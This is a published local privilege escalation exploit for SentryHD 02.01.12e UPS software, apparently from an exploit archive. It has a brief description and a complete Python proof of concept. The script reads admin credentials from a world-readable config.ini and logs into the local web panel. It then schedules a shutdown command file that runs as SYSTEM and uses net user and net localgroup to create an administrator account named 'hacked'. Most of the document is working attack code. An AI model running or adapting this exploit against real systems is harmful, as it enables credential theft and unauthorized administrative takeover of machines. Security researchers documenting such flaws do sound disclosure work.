1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108 | '''
# Exploit Title: SentryHD 02.01.12e Privilege Escalation
# Date: 18-01-2017
# Software Link: http://www.minutemanups.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: local
1. Description
Every user can read: c:\Program Files (x86)\SentryHD\config.ini.
Inside this ini file we can find login and password for web panel.
UPSMan is running on autostart as System.
Using Execute Command File we can execute commands on Scheduled system shutdown as System.
https://security.szurek.pl/sentryhd-020112e-privilege-escalation.html
2. Proof of Concept
'''
import ConfigParser
import hashlib
import re
import urllib2
import urllib
from cookielib import CookieJar
import os
import datetime
import subprocess
import time
new_user_name = "hacked"
print "SentryHD 02.01.12e Privilege Escalation"
print "by Kacper Szurek"
print "http://security.szurek.pl/"
print "https://twitter.com/KacperSzurek"
config = ConfigParser.RawConfigParser()
config.read('c:\\Program Files (x86)\\SentryHD\\config.ini')
admin_user = config.get("Web", 'User0')
admin_password = config.get("Web", 'Password0')
print "[+] Find admin user: '{}' and password: '{}'".format(admin_user, admin_password)
cj = CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
challenge = re.search("\"Challenge\" value=\"(.*?)\"", opener.open("http://localhost/").read())
formdata = { "Username" : admin_user, "Password": admin_password, "Challenge" : challenge, "Response": hashlib.md5(admin_user+admin_password+challenge.group(1)).hexdigest()}
opener.open("http://localhost/delta/login", urllib.urlencode(formdata))
if "calcResponse()" in opener.open("http://localhost/home.asp").read():
print "[-] Failed to login"
os._exit(0)
bat_path = os.path.dirname(os.path.abspath(__file__))+"\\create_user.bat"
payload = open(bat_path, "w")
payload.write("net user {} /add\n".format(new_user_name))
payload.write("net localgroup Administrators {} /add".format(new_user_name))
payload.close()
print "[+] Create payload: {}".format(bat_path)
formdata = {"ACT_SHUT_TYPE":0, "ACT_UPS_DELAY":10, "ACT_PF_EN": "on", "ACT_OSD_PF":999, "ACT_BL_EN": "on", "ACT_OSD_BL":999, "ACT_SS_EN":"on","ACT_OSD_SS":999, "ACT_LS_EN":"on", "ACT_LS_DELAY":999, "SUB_SHUTDOWN":"Submit"}
opener.open("http://localhost/delta/mgnt_reaction", urllib.urlencode(formdata))
formdata = {"ACT_MSG_EN":1, "ACT_MSG_PERIOD":999, "ACT_CMD_EN":1, "ACT_CMD_FILE":bat_path, "ACT_CMD_BEFORE": 990, "SUB_REACTION":"Submit"}
opener.open("http://localhost/delta/mgnt_reaction", urllib.urlencode(formdata))
current_time = datetime.datetime.today()+datetime.timedelta(0,90)
shutdown_date = current_time.strftime('%m/%d/%Y')
shutdown_time = current_time.strftime('%H:%M')
formdata = {"SSH_SD1":shutdown_date, "SSH_TM1":shutdown_time, "SSH_ACT1":1}
opener.open("http://localhost/delta/mgnt_sschedule", urllib.urlencode(formdata))
print "[+] Set shutdown time: {} {}".format(shutdown_date, shutdown_time)
print "[+] Waiting for user creation"
i = 0
while True:
if i > 100:
print "[-] Exploit failed"
os._exit(0)
netuser, _ = subprocess.Popen("net users", stdout=subprocess.PIPE, stderr=None, shell=False).communicate()
if new_user_name in netuser:
break
print "." ,
time.sleep(2)
i += i
print "\n[+] Account created, cancel shutdown"
formdata = {"SHUT_CANCEL":"Cancel Countdown"}
opener.open("http://localhost/delta/mgnt_control", urllib.urlencode(formdata))
print "[+] OK"
|
